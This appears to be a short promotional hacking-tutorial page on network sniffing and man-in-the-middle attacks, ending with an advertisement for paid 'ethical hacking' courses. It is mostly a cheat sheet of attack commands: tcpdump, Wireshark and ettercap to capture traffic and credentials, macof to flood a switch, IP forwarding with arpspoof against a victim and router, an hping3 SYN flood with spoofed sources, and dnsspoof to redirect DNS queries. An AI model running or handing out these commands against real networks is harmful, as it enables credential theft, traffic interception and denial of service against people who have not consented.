These are the foundation of all network attacks. Every hacker must understand how data flows and how to intercept it.
On a hub network or with monitor mode, you can capture ALL traffic without any active attack.
# Capture all HTTP traffic
tcpdump -i eth0 -A 'port 80'
# Capture with Wireshark
wireshark -i eth0 -k
# Capture credentials
ettercap -T -i eth0Modern networks use switches that send traffic only to the intended port. Active attacks are needed:
macof -i eth0
# Floods switch's CAM table → switch becomes a hub# Become the man in the middle
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t victim router
arpspoof -i eth0 -t router victim# Send packets with fake source IP
hping3 -S --flood -V -p 80 --rand-source target# Redirect dns queries to fake server
dnsspoof -i eth0 -f hosts.txtSubscribe to ONLY4YOU and get hands-on access to 40+ premium courses — Ethical Hacking, Kali Linux, Metasploit, Network Hacking, Bug Bounty & more!